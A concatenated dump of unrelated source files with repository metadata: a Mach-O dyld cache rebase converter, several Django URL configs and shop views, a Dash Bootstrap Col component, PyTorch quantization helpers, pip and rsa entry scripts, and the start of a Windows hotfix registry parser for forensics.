self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_SET_TYPE_IMM | MachO.Rebase.REBASE_TYPE_POINTER)
def convert(self) -> None:
"""
Starts the conversion.
"""
self.rebaseSegment(self.machoFile.getSegment(b"__DATA_CONST\x00"))
self.rebaseSegment(self.machoFile.getSegment(b"__DATA\x00"))
self.rebaseSegment(self.machoFile.getSegment(b"__DATA_DIRTY\x00"))
self.finalize()
pass
def rebaseSegment(self, segment: MachO.segment_command_64) -> None:
"""
Processes the slide info for one segment.
"""
if not segment:
return
dataStart = self.dyldFile.mappings[1].address
# get the page index which contains the start and end of the segment.
pageSize = self.dyldFile.slideInfo.page_size
startPageAddr = segment.vmaddr - dataStart
startPage = int(startPageAddr / pageSize)
		endPageAddr = (((segment.vmaddr + segment.vmsize) - dataStart) + pageSize - 1) & ~(pageSize - 1)  # round up to a page boundary
endPage = int(endPageAddr / pageSize)
# process each page
pageStarts = struct.iter_unpack("<H", self.dyldFile.slideInfo.pageStartsData)
pageStarts = [page[0] for page in pageStarts]
for i in range(startPage, endPage):
page = pageStarts[i]
if page == Dyld.Slide.DYLD_CACHE_SLIDE_PAGE_ATTR_NO_REBASE:
pass
elif page & Dyld.Slide.DYLD_CACHE_SLIDE_PAGE_ATTR_EXTRA:
raise Exception("Can't handle page extras")
elif (page & Dyld.Slide.DYLD_CACHE_SLIDE_PAGE_ATTR_EXTRA) == 0:
pageOffset = (i * pageSize) + self.dyldFile.mappings[1].fileOffset
self.rebasePage(pageOffset, page * 4, segment)
else:
raise Exception("Unknown page type")
pass
def rebasePage(self, pageOffset: int, firstRebaseOffset: int, segment: MachO.segment_command_64) -> None:
"""
processes the rebase infomation in a page
### parameters
pageOffset: int
The file offset of the page.
firstRebaseOffset: int
The offset from the start of the page to the first
rebase location.
segment: segment_command_64
The segment to rebase.
"""
segmentIndex = self.machoFile.loadCommands.index(segment)
deltaMask = self.dyldFile.slideInfo.delta_mask
valueMask = ~deltaMask
valueAdd = self.dyldFile.slideInfo.value_add
# basically __builtin_ctzll(deltaMask) - 2;
deltaShift = "{0:b}".format(deltaMask)
deltaShift = len(deltaShift) - len(deltaShift.rstrip("0"))
deltaShift = deltaShift - 2
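		# e.g. a deltaMask of 0x00FF000000000000 has 48 trailing zero bits, so
		# deltaShift = 48 - 2 = 46; shifting by (trailing zeros - 2) extracts the
		# delta field already multiplied by 4, i.e. as a byte offset.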
delta = 1
rebaseOffset = firstRebaseOffset
while delta != 0:
realLoc = pageOffset + rebaseOffset
self.dyldFile.file.seek(realLoc)
rawValueBytes = self.dyldFile.file.read(8)
rawValue = struct.unpack("<Q", rawValueBytes)[0]
delta = (rawValue & deltaMask) >> deltaShift
value = rawValue & valueMask
if value:
value += valueAdd
# if the location is within the segment, adjust the data
if realLoc >= segment.fileoff and realLoc < (segment.fileoff + segment.filesize):
self.slideLocation(realLoc, value, segment)
# add a rebase entry
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB | segmentIndex)
self.rebaseInfo += Uleb128.encodeUleb128(realLoc - segment.fileoff)
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_DO_REBASE_IMM_TIMES | 0x1)
rebaseOffset += delta
def slideLocation(self, fileOffset: int, value: int, segment: MachO.segment_command_64) -> None:
"""
Sets the value at the file offset.
"""
# find the section with the fileOffset
containingSect = None
for section in segment.sections:
if fileOffset >= section.offset and fileOffset < (section.offset + section.size):
containingSect = section
break
if not containingSect:
raise Exception("Unable to find section")
# write it
sectionOff = fileOffset - containingSect.offset
		sectionData = containingSect.sectionData[0:sectionOff]
		sectionData += struct.pack("<Q", value)
		sectionData += containingSect.sectionData[sectionOff + 8:]
containingSect.sectionData = sectionData
def finalize(self) -> None:
"""
Finalizes the rebase info, and sets the data in the macho file.
"""
self.rebaseInfo.append(MachO.Rebase.REBASE_OPCODE_DONE)
dyldCommand = self.machoFile.getLoadCommand((MachO.LoadCommands.LC_DYLD_INFO, MachO.LoadCommands.LC_DYLD_INFO_ONLY))
dyldCommand.rebaseData = bytes(self.rebaseInfo)
dyldCommand.rebase_size = len(self.rebaseInfo)
|
[
"haow6449@gmail.com"
] |
haow6449@gmail.com
|
b5330606886b1e17f9c48c5b8b435ce85f4c5b24
|
5974396434d3cbff785f696b80d27e6fc92c7ffd
|
/posts/urls.py
|
e75b65c76d911c104716de59e714a82cbd8fe3ec
|
[] |
no_license
|
thevivekshukla/django-blog
|
66a5a8e319269e627da7840626b433c40e2faa42
|
f521e2e72789cb3cdd85d5b2ccab9c2bdd204f66
|
refs/heads/master
| 2021-01-01T16:24:39.907564
| 2017-09-11T09:44:54
| 2017-09-11T09:44:54
| 97,830,071
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 577
|
py
|
from django.conf.urls import url
from . import views
app_name = 'posts'
urlpatterns = [
url(r'^post/new/$', views.post_create, name='post_create'),
url(r'^(?P<slug>[\w-]+)/$', views.post_detail, name='post_detail'),
url(r'^$', views.post_list, name='post_list'),
url(r'^(?P<slug>[\w-]+)/edit/$', views.post_update, name='post_update'),
url(r'^(?P<slug>[\w-]+)/delete/$', views.post_delete, name='post_delete'),
url(r'^post/draft/$', views.post_draft, name="post_draft"),
url(r'^post/published/$', views.post_published, name="post_published"),
]
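# Hedged usage note: with app_name = 'posts', these routes reverse via the
# namespaced names, e.g. reverse('posts:post_detail', kwargs={'slug': 'my-post'}).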
|
[
"viv3kshukla@gmail.com"
] |
viv3kshukla@gmail.com
|
5e1999c89045efcad19540cd757f6d1fdfc21ab2
|
80da32b5ff1006f572920839a884edbdc7848902
|
/web/main/urls.py
|
e5ab3f774606d5a834fbb28352548e67ddf82751
|
[] |
no_license
|
SilinAlexander/Shop2
|
1f09c58d1463ef195df37418c267f2e3b6c51172
|
98fe52e97b0b8231d62674a39985e940a263f342
|
refs/heads/master
| 2023-04-03T13:42:48.284467
| 2021-04-10T10:16:00
| 2021-04-10T10:16:00
| 345,267,486
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 628
|
py
|
from django.contrib.auth.decorators import login_required
from django.views.generic import RedirectView
from django.contrib.auth.views import LogoutView
from django.urls import path
from . import views
urlpatterns = [
# path('', login_required(RedirectView.as_view(pattern_name='admin:index'))),
path('', views.BaseView.as_view(), name='base'),
path('signup/', views.UserSignUpView.as_view(), name='signup'),
path('logout/', LogoutView.as_view(next_page='/'), name='logout'),
path('login/', views.UserSignInView.as_view(), name='login'),
# path('email/', views.SendEmailView.as_view(), name='login'),
]
|
[
"asilin1997@mail.ru"
] |
asilin1997@mail.ru
|
c002bc2b4eb785c4ce7ad08f53bfcf002e3a8920
|
cb0c6a71c47b78cf0511fafc8e31deafcd77dbf2
|
/pages 0-100/first_letter.py
|
c48501988f2a12bd130cf86dfb407a88ca4866b5
|
[] |
no_license
|
kaismithereens/realpython
|
123ef939c1822508980ba8a042d5d1ed442c2e75
|
7c57efbe12a3eaa4e8245b72486a77fc2cf78c74
|
refs/heads/master
| 2021-04-27T08:50:01.159261
| 2018-11-03T10:30:40
| 2018-11-03T10:30:40
| 122,499,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
user_input = input("Tell me your password: ")
first_letter = user_input[0].upper()
print(first_letter)
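# Hedged note (illustrative, not in the original): user_input[0] raises
# IndexError when the input is empty; a guarded variant could be:
#   first_letter = user_input[0].upper() if user_input else ""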
|
[
"kai.nevermind@gmail.com"
] |
kai.nevermind@gmail.com
|
d81e23a2907a7d07f2afa16bf3158c280073b0b7
|
26c744710944c807d75e14d321fcdb796dc723d8
|
/env/Lib/site-packages/dash_bootstrap_components/_components/Col.py
|
e74c8bd8e7c17c32464a721cb7d3d0fd0a852125
|
[] |
no_license
|
12JoshiMukesh/ServiceNowDashboard
|
2aa0f7031021f43d3160bc048103d114c230dc5e
|
0685dcceb082c6a9b68255e95573b664d3fee343
|
refs/heads/master
| 2023-08-04T17:04:46.449153
| 2021-09-25T06:18:14
| 2021-09-25T06:18:14
| 408,410,106
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,650
|
py
|
# AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Col(Component):
"""A Col component.
Component for creating Bootstrap columns to control the layout of your page.
Use the width argument to specify width, or use the breakpoint arguments
(xs, sm, md, lg, xl) to control the width of the columns on different screen
sizes to achieve a responsive layout.
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional):
The children of this component.
- id (string; optional):
The ID of this component, used to identify dash components in
callbacks. The ID needs to be unique across all of the components
in an app.
- align (a value equal to: 'start', 'center', 'end', 'stretch', 'baseline'; optional):
Set vertical alignment of this column's content in the parent row.
Options are 'start', 'center', 'end', 'stretch', 'baseline'.
- className (string; optional):
Often used with CSS to style elements with common properties.
- key (string; optional):
A unique identifier for the component, used to improve performance
by React.js while rendering components See
https://reactjs.org/docs/lists-and-keys.html for more info.
- lg (optional):
Specify column behaviour on a large screen. Valid arguments are
boolean, an integer in the range 1-12 inclusive, or a dictionary
with keys 'offset', 'order', 'size'. See the documentation for
more details.
- loading_state (dict; optional):
Object that holds the loading state object coming from
dash-renderer.
`loading_state` is a dict with keys:
- component_name (string; optional):
Holds the name of the component that is loading.
- is_loading (boolean; optional):
Determines if the component is loading or not.
- prop_name (string; optional):
Holds which property is loading.
- md (optional):
Specify column behaviour on a medium screen. Valid arguments are
boolean, an integer in the range 1-12 inclusive, or a dictionary
with keys 'offset', 'order', 'size'. See the documentation for
more details.
- sm (optional):
Specify column behaviour on a small screen. Valid arguments are
boolean, an integer in the range 1-12 inclusive, or a dictionary
with keys 'offset', 'order', 'size'. See the documentation for
more details.
- style (dict; optional):
Defines CSS styles which will override styles previously set.
- width (optional):
Specify the width of the column. Behind the scenes this sets
    behaviour at the xs breakpoint, and will be overridden if xs is
specified. Valid arguments are boolean, an integer in the range
1-12 inclusive, or a dictionary with keys 'offset', 'order',
'size'. See the documentation for more details.
- xl (optional):
Specify column behaviour on an extra large screen. Valid
arguments are boolean, an integer in the range 1-12 inclusive, or
a dictionary with keys 'offset', 'order', 'size'. See the
documentation for more details.
- xs (optional):
Specify column behaviour on an extra small screen. Valid
arguments are boolean, an integer in the range 1-12 inclusive, or
a dictionary with keys 'offset', 'order', 'size'. See the
documentation for more details."""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, style=Component.UNDEFINED, className=Component.UNDEFINED, key=Component.UNDEFINED, width=Component.UNDEFINED, xs=Component.UNDEFINED, sm=Component.UNDEFINED, md=Component.UNDEFINED, lg=Component.UNDEFINED, xl=Component.UNDEFINED, align=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'align', 'className', 'key', 'lg', 'loading_state', 'md', 'sm', 'style', 'width', 'xl', 'xs']
self._type = 'Col'
self._namespace = 'dash_bootstrap_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'align', 'className', 'key', 'lg', 'loading_state', 'md', 'sm', 'style', 'width', 'xl', 'xs']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Col, self).__init__(children=children, **args)
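# Hedged usage sketch (assumes dash and dash-bootstrap-components are
# installed; the width values follow the docstring above):
#
#   import dash_bootstrap_components as dbc
#   row = dbc.Row([
#       dbc.Col("sidebar", width=4, lg=3),
#       dbc.Col("content", width=8, lg=9),
#   ])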
|
[
"MAILNDG@REDIFF.com"
] |
MAILNDG@REDIFF.com
|
9e4a6f3e8b974eb720523b31486a9285b279b22f
|
c7219c4d42071b623782522c5620b7cccbf38747
|
/venv/Scripts/pip3-script.py
|
0c2f3987f3d8952c8783d6f27fc28f092f75bc6c
|
[] |
no_license
|
hongli9388/auto-register
|
f62c8900e45ce18ad7c3759b72d9ef74b86b7493
|
7f0a21b60db14c4b8c72e924a17a1ecd943d4296
|
refs/heads/master
| 2022-12-16T17:06:22.058761
| 2019-01-18T06:31:50
| 2019-01-18T06:31:50
| 164,560,647
| 0
| 0
| null | 2022-12-08T01:32:44
| 2019-01-08T04:28:05
|
Python
|
UTF-8
|
Python
| false
| false
| 410
|
py
|
#!E:\pycharm_home\auto_test_register_api\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3')()
)
|
[
"hongli9388@163.com"
] |
hongli9388@163.com
|
72e6050d6c33d356d46e738ec6c5040e26acc627
|
fea4df9f31e62d7fc1adf0a5ca08c017cce504c1
|
/site_experiences/admin.py
|
b85e9c2ffdea9f247944eba23d694ef359d65798
|
[] |
no_license
|
tahericode/personal-site-with-django
|
47eec11c243d047ced7bb997913b53c902913b23
|
0f1a4fc7aa1489487fdae174b4b75c4ab037106d
|
refs/heads/main
| 2023-07-07T07:29:10.454706
| 2021-08-03T19:48:37
| 2021-08-03T19:48:37
| 392,434,831
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 126
|
py
|
from django.contrib import admin
# Register your models here.
from .models import Experience
admin.site.register(Experience)
|
[
"mrtcode2@gmail.com"
] |
mrtcode2@gmail.com
|
ef1289616c727ba7825f172842386212c6a0bb58
|
447c7a2c057c02488f6ebf79caba738ab5472fa0
|
/Well Planned Code/well_planned/well_planned/urls.py
|
5e646cfd436dcaa621e623dee859cfab760cba9d
|
[] |
no_license
|
Ashish-3001/Well-Planned
|
71fba1e4834a41eac198bdb9e815d64fd87e4cbc
|
be9158688f09e4e79d27cd3c22f21b045763e982
|
refs/heads/main
| 2023-07-17T03:44:53.137726
| 2021-09-02T06:57:57
| 2021-09-02T06:57:57
| 402,314,142
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
"""well_planned URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from my_app import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.Home),
path('todoList/', include('todo.urls')),
path('dairyList/', include('entries.urls')),
path('reminders/', include('remindapp.urls')),
path('wallet/', include('expensetrack.urls')),
path('weather/', views.Weather),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
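# Hedged note: django.conf.urls.static.static() returns an empty pattern list
# unless settings.DEBUG is True, so this static serving only applies in
# development; production setups typically serve STATIC_ROOT via the web server.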
|
[
"cvnnashish@gmail.com"
] |
cvnnashish@gmail.com
|
20163c0275e74a387eb1f8fc5d48e35d34d934c1
|
fcb0d7f9e92349a5b512e26f3318b29e04636889
|
/proyecto_colima/settings/memo.py
|
0e04eb2d550f1c892965f53720266e872ad21e49
|
[] |
no_license
|
alexabyx/RESPALDO-COLIMA
|
fc9f06ce38d2590499b45c0f97b25f9661663bf3
|
62cbe9c2700ccf01b40bd8e134dfc9ccf951fde3
|
refs/heads/master
| 2021-01-19T17:12:03.260726
| 2015-03-09T03:12:35
| 2015-03-09T03:12:35
| 30,132,081
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
from .common import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'so_factory',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '3306',
'OPTIONS': {
'init_command': 'SET storage_engine=INNODB',
},
}
}
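# Hedged note: MySQL 5.7 removed the session variable used above; on newer
# servers the equivalent option would be
#   'init_command': 'SET default_storage_engine=INNODB',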
|
[
"alexabyx@gmail.com"
] |
alexabyx@gmail.com
|
e9bed052d8dc90762bbb0cc2031106059fedb6e3
|
dcd8a0a9ce04818487ba7d46a1ba07d18fb08b9f
|
/torch/quantization/_quantize_script.py
|
5d77785cc7742a543324d7df64ba47cd81852158
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
thomaswang525/pytorch
|
284efc782fdc333e24892ac10b4d8963f812bd0b
|
9e3605de98abb969124faff96e6e90e4f4014eb6
|
refs/heads/master
| 2021-05-18T08:30:09.190932
| 2020-03-30T02:46:19
| 2020-03-30T02:48:29
| 251,193,560
| 1
| 0
|
NOASSERTION
| 2020-03-30T03:38:57
| 2020-03-30T03:38:57
| null |
UTF-8
|
Python
| false
| false
| 4,668
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import torch
from .qconfig import QConfig
from torch.jit._recursive import wrap_cpp_module
class ConvPackedParams(torch.nn.Module):
def __init__(self):
super(ConvPackedParams, self).__init__()
wq = torch._empty_affine_quantized([1, 1, 1, 1], scale=1.0, zero_point=0, dtype=torch.qint8)
self.stride = [1, 1]
self.padding = [0, 0]
self.dilation = [1, 1]
self.groups = 1
self.set_weight_bias(wq, None)
@torch.jit.export
def set_conv_params(self, stride, padding, dilation, groups):
# type: (List[int], List[int], List[int], int) -> None
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
@torch.jit.export
def set_weight_bias(self, weight, bias):
# type: (torch.Tensor, Optional[torch.Tensor]) -> None
self._packed_params = torch.ops.quantized.conv2d_prepack(weight, bias, self.stride,
self.padding, self.dilation, self.groups)
@torch.jit.export
def _weight_bias(self):
return torch.ops.quantized.conv2d_unpack(self._packed_params)
def forward(self, x):
return x
@torch.jit.export
def __getstate__(self):
qweight, bias = self._weight_bias()
return (qweight,
bias,
self.stride,
self.padding,
self.dilation,
self.groups,
self.training)
@torch.jit.export
def __setstate__(self, state):
self.stride = state[2]
self.padding = state[3]
self.dilation = state[4]
self.groups = state[5]
self.set_weight_bias(state[0],
state[1])
self.training = state[6]
linear_packed_params = None
conv_packed_params = None
if 'fbgemm' in torch.backends.quantized.supported_engines:
linear_packed_params = torch.jit.script(torch.nn.quantized.modules.linear.LinearPackedParams())._c
conv_packed_params = torch.jit.script(ConvPackedParams())._c
def _check_is_script_module(model):
if not isinstance(model, torch.jit.ScriptModule):
raise ValueError('input must be a script module, got: ' + str(type(model)))
def script_qconfig(qconfig):
return QConfig(
activation=torch.jit.script(qconfig.activation())._c,
weight=torch.jit.script(qconfig.weight())._c)
def prepare_script(model, qconfig_dict, inplace=False):
_check_is_script_module(model)
scripted_qconfig_dict = {k: script_qconfig(v) if v else None for k, v in qconfig_dict.items()}
if not inplace:
model = model.copy()
model = wrap_cpp_module(torch._C._jit_pass_insert_observers(model._c,
'forward',
scripted_qconfig_dict,
False))
return model
def prepare_dynamic_script(model, qconfig_dict):
_check_is_script_module(model)
scripted_qconfig_dict = {k: script_qconfig(v) for k, v in qconfig_dict.items()}
model = wrap_cpp_module(torch._C._jit_pass_insert_observers(model._c,
'forward',
scripted_qconfig_dict,
False,
True))
return model
def convert_script(model, inplace=False, debug=False):
_check_is_script_module(model)
if not inplace:
model = model.copy()
model.eval()
model = wrap_cpp_module(torch._C._jit_pass_insert_quant_dequant(model._c, 'forward', False))
if not debug:
model = wrap_cpp_module(torch._C._jit_pass_quant_finalize(model._c))
return model
def quantize_script(model, qconfig_dict, run_fn, run_args, inplace=False, debug=False):
_check_is_script_module(model)
if not model._c._has_method('forward'):
raise ValueError('input script module does not have forward method')
assert not inplace, "We don't support inplace right now"
if not inplace:
model = model.copy()
torch._C._jit_pass_dedup_module_uses(model._c)
model = wrap_cpp_module(torch._C._jit_pass_fold_convbn(model._c))
model = prepare_script(model, qconfig_dict, True)
run_fn(model._c._get_method('forward'), *run_args)
model = convert_script(model, True, debug)
return model
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
f3d66fab8fe7027335f3df1d85adf1ea5da47df9
|
78fc676ac58b534ef695096b871de84c37a8d5c7
|
/env/bin/pyrsa-keygen
|
264cc096b710486dad6d5fcd5cb49617537b49d7
|
[
"Apache-2.0"
] |
permissive
|
Pinto18/raspi_gassistant
|
60604ebb96b1150b64a19fe5a8a38f802ed37597
|
73910133a0f7b26d0d73f66ba48b056fa43a14d8
|
refs/heads/master
| 2021-08-30T05:17:12.812347
| 2017-12-16T04:44:53
| 2017-12-16T04:44:53
| 112,860,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
#!/home/pi/AIY-voice-kit-python/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from rsa.cli import keygen
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(keygen())
|
[
"pinto18.nd@gmail.com"
] |
pinto18.nd@gmail.com
|
|
eb2afda534a4e5d491b7d7b16a23a8f16d664115
|
985fd329007bc781e05604e65b260d0faf8eaec5
|
/views.py
|
f3a0efcf2d0958806d023371cab355556098ad0f
|
[] |
no_license
|
zdanozdan/mshop
|
e2c5d0c89e3ba89296e5f58a12cf16e08bb78751
|
1c7f3187870a5c86a07d7f46fa01b03165c621de
|
refs/heads/master
| 2021-03-12T20:07:36.954175
| 2012-10-26T14:21:23
| 2012-10-26T14:21:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,112
|
py
|
# This Python file uses the following encoding: utf-8
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template import RequestContext
from django.utils.translation import ugettext as _
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from shop.views.cart import CartDetails, CartItemDetail
from shop.views import ShopListView
from models import MikranProduct
import logging
from shop.util.cart import get_or_create_cart
from shop.forms import get_cart_item_formset
from shop.models.cartmodel import Cart,CartItem
from shop.forms import CartItemModelForm
from forms import CartForm
class WelcomeListView(ShopListView):
template_name = 'welcome.html'
model = MikranProduct
def dispatch(self, *args, **kwargs):
return super(WelcomeListView, self).dispatch(*args, **kwargs)
def do_currency_switch(self):
currency = self.request.session.get(settings.CURRENCY_COOKIE_NAME)
if currency in settings.CURRENCIES_LIST:
if MikranProduct.set_currency(self.request, code=currency) is True:
#logging.debug('currency set OK')
return
if MikranProduct.set_currency(self.request, code=settings.DEFAULT_CURRENCY) is True:
output = _('Error setting currency. Switched to default currency : %(currency)s') % {'currency': settings.DEFAULT_CURRENCY }
messages.add_message(self.request,messages.ERROR, output)
self.request.session[settings.CURRENCY_COOKIE_NAME] = settings.DEFAULT_CURRENCY
return
""" error currency setting """
if currency != settings.HOME_CURRENCY:
output = _('Error setting currency. Switched to default currency : %(currency)s') % {'currency': settings.DEFAULT_CURRENCY }
messages.add_message(self.request,messages.ERROR, output)
self.request.session[settings.CURRENCY_COOKIE_NAME] = settings.DEFAULT_CURRENCY
def get_queryset(self):
return MikranProduct.objects.all()[:5]
def get_context_data(self, **kwargs):
ctx = super(ShopListView, self).get_context_data(**kwargs)
#set up the currency before we use the cart itself
self.do_currency_switch()
state={'country':self.request.session.get('django_country')}
cart_object = get_or_create_cart(self.request)
cart_object.update(state)
ctx.update({'cart': cart_object})
ctx.update({'cart_items': cart_object.get_updated_cart_items()})
formset = get_cart_item_formset(cart_items=ctx['cart_items'])
ctx.update({'formset': formset, })
ctx.update({'cart_form': CartForm(instance=cart_object) })
return ctx
class MikranCart(CartDetails):
def update_context_with_cart_form(self,ctx):
cart_object = get_or_create_cart(self.request)
state={'country':self.request.session.get('django_country')}
cart_object.update(state)
ctx.update({'cart': cart_object})
ctx.update({'cart_items': cart_object.get_updated_cart_items()})
formset = get_cart_item_formset(cart_items=ctx['cart_items'])
ctx.update({'formset': formset, })
ctx.update({'cart_form': CartForm(instance=cart_object) })
return ctx
class MikranCartItemDetail(MikranCart):
template_name = "cart.html"
def post_success(self, product, cart_item):
"""
Post success hook
"""
messages.add_message(self.request,messages.INFO, _('Product (%s) has been added to basket') % (product),extra_tags='basket_only')
return redirect(self.request.POST.get('next'))
def get(self, request, *args, **kwargs):
#ctx = super(ShopListView, self).get_context_data(**kwargs)
ctx = self.get_context_data(**kwargs)
self.update_context_with_cart_form(ctx)
return self.render_to_response(ctx)
class MikranCartDetails(MikranCart):
template_name = 'cart.html'
def get(self, *args, **kwargs):
context = self.get_context_data(**kwargs)
self.update_context_with_cart_form(context)
return self.render_to_response(context)
"""
Deletes one of the cartItems. This should be posted to a properly
RESTful URL (that should contain the item's ID):
http://example.com/shop/cart/item/12345
"""
def delete(self, request, *args, **kwargs):
cart_object = get_or_create_cart(self.request)
item_id = self.kwargs.get('id')
item = cart_object.delete_item(item_id)
messages.add_message(request,messages.INFO, _('Product (%s) has been deleted from basket') % (item.product),extra_tags='basket_only')
if cart_object.get_items_count() == 0:
            messages.add_message(request, messages.WARNING, _('You have deleted all products. Basket is empty now.'), extra_tags='basket_only')
return self.redirect()
def post(self, *args, **kwargs):
cart_object = get_or_create_cart(self.request)
f = CartForm(self.request.POST,instance=cart_object)
if f.is_valid():
f.save()
#Message only for EU cart clickers
if cart_object.is_eu_cart:
messages.add_message(self.request,messages.INFO, _('Remember that you need to have valid EU VAT number to claim 0% EU VAT rate'),extra_tags='basket_only')
else:
messages.add_message(self.request,messages.ERROR, _('Error changing VAT rate.'),extra_tags='basket_only')
return redirect(self.request.POST.get('next'))
def put(self, *args, **kwargs):
""" Update shopping cart form. """
context = self.get_context_data(**kwargs)
self.update_context_with_cart_form(context)
formset = get_cart_item_formset(cart_items=context['cart_items'],data=self.request.POST)
""" valid form redirects to get cart again, otherwise re-display form with errors """
if formset.is_valid():
formset.save()
messages.add_message(self.request,messages.INFO, _('Item quantity has been successfully changed.'),extra_tags='basket_only')
return self.redirect()
messages.add_message(self.request,messages.ERROR, _('Unable to change item quantity.'),extra_tags='basket_only')
context.update({'formset': formset, })
return self.render_to_response(context)
""" ajax call redirects to render cart object only, otherwise we want to redirect to next, or main page if next is missing"""
def redirect(self):
if self.request.is_ajax():
return HttpResponseRedirect(reverse('mikran_cart_get'))
if self.request.POST.get('next') is not None:
return HttpResponseRedirect(self.request.POST.get('next'))
return HttpResponseRedirect(reverse('main_page'))
def shop(request):
return render_to_response('welcome.html',
context_instance=RequestContext(request))
|
[
"tomasz@mikran.pl"
] |
tomasz@mikran.pl
|
3a16940ab2a40e617ed92c2249c39f81f6e348a5
|
b553e12ccd8d7d4653e8987688494e322602b146
|
/scripts/process/hotfixes/hotfixes.py
|
c5ad7d2ee221c15e40f05ba30bc00eb6616c2370
|
[
"MIT"
] |
permissive
|
fossabot/forensicworkflows
|
2a7339bc9e97f18e8a4f432e7a534f5318e1e8dc
|
fca4bcf5363163e6fdd78763fa4aa208c1f72d1f
|
refs/heads/master
| 2022-04-14T21:36:26.770660
| 2020-04-13T15:24:58
| 2020-04-13T15:24:58
| 255,069,891
| 0
| 0
| null | 2020-04-12T11:41:41
| 2020-04-12T11:41:40
| null |
UTF-8
|
Python
| false
| false
| 5,301
|
py
|
#!/usr/bin/env python
# Copyright (c) 2019 Siemens AG
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# Author(s): Demian Kellermann
"""
This plugin parses different registry entries for installed Hotfixes (patches) to the Windows system
as well as to other software components
"""
import logging
import re
import struct
from collections import defaultdict
from datetime import datetime
import forensicstore
from ...util import combined_conditions
LOGGER = logging.getLogger(__name__)
HOTFIX_PATHS_INSTALLER = [
'hkey_local_machine\\software\\microsoft\\windows\\currentversion\\component based servicing\\packages\\',
]
HOTFIX_PATHS_ADDITIONAL = [
'hkey_local_machine\\software\\wow6432node\\microsoft\\updates\\',
'hkey_local_machine\\software\\microsoft\\updates\\',
]
KB_REGEX = re.compile(r'KB\d+')
def _analyze_installer(obj):
entries = []
installer_entries = defaultdict(set)
hotfix_infos = {v["name"].lower(): v["data"] for v in obj["values"]}
if hotfix_infos.get('InstallClient') != 'WindowsUpdateAgent':
return []
hotfix = KB_REGEX.search(obj["key"].split('\\')[-1])
if not hotfix:
# some entries do not have the KB number in the title, but something like "RollupFix", check
# the InstallLocation value in this case
location = hotfix_infos.get('InstallLocation')
if location:
hotfix = KB_REGEX.search(location)
if not hotfix:
LOGGER.info("Non KB entry for WindowsUpdateAgent found: %s",
obj["key"])
return []
